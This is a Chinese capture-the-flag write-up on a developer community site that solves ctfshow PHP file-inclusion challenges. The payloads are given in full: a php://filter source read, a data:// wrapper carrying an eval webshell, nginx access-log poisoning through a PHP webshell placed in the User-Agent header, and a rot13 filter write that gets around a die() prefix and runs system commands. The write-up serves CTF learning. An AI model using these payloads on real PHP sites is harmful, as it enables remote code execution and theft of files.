备案控制台

开发者社区开发与运维文章正文

[CTF]ctfshow文件包含

2024-04-15 67

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

本文涉及的产品

日志服务 SLS，月写入数据量 50GB 1个月

简介： [CTF]ctfshow文件包含

尝试使用伪协议

直接使用

?file=php://filter/convert.base64-encode/resource=flag.php

将flag.php的内容包含进来，以base64 encode 的方式回显，使用base64 decode即可得到flag.php的源码

GET中过滤了`php`

考虑使用其他伪协议

?file=data://text/plain,<?= eval($_POST[1]) ?>

在post中1=system("tac flag.php");

GET中过滤了`php` `data`

考虑构造特殊的User-Agent，让访问信息记录到日志文件中，包含含有User-Agent 值的日志

使用User-Agent为<?php eval($_POST[1]); ?>发包

这次访问被记录到日志中

在GET中包含日志文件，?file=/var/log/nginx/access.log

同时在POST中，尝试执行命令1=phpinfo();，查看回显

（在hackbar 修改ua头很方便，记得把构造的ua头取消勾选，日志记录了多个eval就会在执行时执行多次）

有几个脚本题之后再分析

web87题目

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
    
}else{
    highlight_file(__FILE__);
}

?file=php://filter/write=string.rot13/resource=2.php

<?php system("tac f*.php");?> <?cuc flfgrz("gnp s*.cuc");?>

之后查看2.php即可

web88

?file=data://text/plain;base64,<?php system('tac fl*.php');echo 'adc';?>aacc

文章标签：

日志服务

PHP

应用服务中间件

nginx

相关实践学习

日志服务之使用Nginx模式采集日志

本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。

游客ebi4wp2ql3fxg

目录

相关文章

游客ebi4wp2ql3fxg

|

9月前

|

前端开发应用服务中间件 PHP

[CTF]ctfshow 文件上传

[CTF]ctfshow 文件上传

游客ebi4wp2ql3fxg

47 0 0

拈花倾城

|

安全前端开发 PHP

[PiKaChu靶场通关]文件包含file include

[PiKaChu靶场通关]文件包含file include

拈花倾城

745 0 0

[PiKaChu靶场通关]文件包含file include

游客ebi4wp2ql3fxg

|

9月前

|

Shell PHP

[CTF]ctfshow命令执行

[CTF]ctfshow命令执行

游客ebi4wp2ql3fxg

60 0 0

秋说

|

前端开发安全网络安全

[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集

File Upload—low level 源码中无过滤

秋说

579 0 0

云勺

|

数据安全/隐私保护 Python Linux

【打酱油】N1CTF部分WP

周末围观神仙们打架，自己也做了几题，也是有所收获的，在这里记录一下。http://n1ctf.xctf.org.cn/ N1CTF.png 0x00 checkin 这是一道签到题 image.

云勺

1622 0 0

亿人安全

|

NoSQL 关系型数据库 MySQL

CTFShow-SSRF(writeup)

CTFShow-SSRF(writeup)

亿人安全

218 0 0

CTFShow-SSRF(writeup)

周周的奇妙编程

|

9月前

|

Ubuntu 网络安全开发者

CTF本地靶场搭建——GZ:CTF安装

GZCTF是一个开源的网络安全竞技平台，由GZTimeWalker维护，提供环境供爱好者和专业人士通过解决CTF题目提升技能。本文档介绍了在Ubuntu 20.04上部署GZCTF的步骤，包括安装操作系统、配置清华镜像源、更新软件、安装Docker和docker-compose，以及根据GZCTF文档创建配置文件并启动服务。完成部署后，用户可在浏览器中看到GZCTF平台。

周周的奇妙编程

1153 2 3

Myon

|

开发工具 git

zsteg安装及CTF打野wp

zsteg安装及CTF打野wp

Myon

431 0 0

API19970108110

|

安全网络安全

Ctf

API19970108110

118 0 0

周周的奇妙编程

|

9月前

|

开发框架监控 Kubernetes

CTF本地靶场搭建——GZ:CTF基础使用

GZ::CTF是一个基于ASP.NET Core的开源CTF竞赛平台，支持Docker或K8s容器部署，提供静态和动态题目类型，包括静态附件、动态附件、静态容器和动态容器，具备动态分值功能，如三血奖励和动态flag作弊检测。平台还具有实时通知、邮件验证、用户权限管理、Writeup收集、流量代理转发等功能。此外，它包含比赛管理、队伍管理、用户管理等多个管理模块，适合举办和参与网络安全竞赛。

周周的奇妙编程

807 23 23

热门文章

最新文章

deepseek部署的详细步骤和方法，基于Ollama获取顶级推理能力！

讨论阶段性给予客户交付物所引发的风险问题

Linus Torvalds将中国亮相LinuxCon + ContainerCon + CloudOpen

DispatcherServlet与初始化主线

网络安全研究人员发现新漏洞：或成另一个WannaCry

Swift中常量和变量的声明

[20160516]adrci purge.txt

Docker Secure Deployment Guidelines

Eclipse没有权限操作rt.jar包中的sun包，导致sun.net.ftp.FtpClient引用报错

Learning Cocos2d-x for WP8（9）——Sprite到哪，我做主

去中心化存储：数据存储的新范式

AI 赋能混合云运维：告别手工操作，迈向智能自愈！

从Excel到大数据：别让工具限制你的思维！

Go 切片导致 rand.Shuffle 产生重复数据的原因与解决方案

基于SVPWM矢量控制的无速度传感器电机控制系统simulink建模与仿真

基于小波变换和峰值搜索的光谱检测matlab仿真,带GUI界面

DragAnything：视频PS来了！开源AI控制器让视频「指哪动哪」：拖拽任意物体轨迹，多对象独立运动一键生成

FoloUp：比HR更懂岗位需求！开源语音面试平台爆火：1份岗位需求生成100问，语音AI追问逻辑漏洞

KTransformers：告别天价显卡！国产框架让单卡24G显存跑DeepSeek-R1 671B大模型：推理速度飙升28倍

基于深度学习的路面裂缝检测算法matlab仿真

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

阿里云oss简介和如何对接使用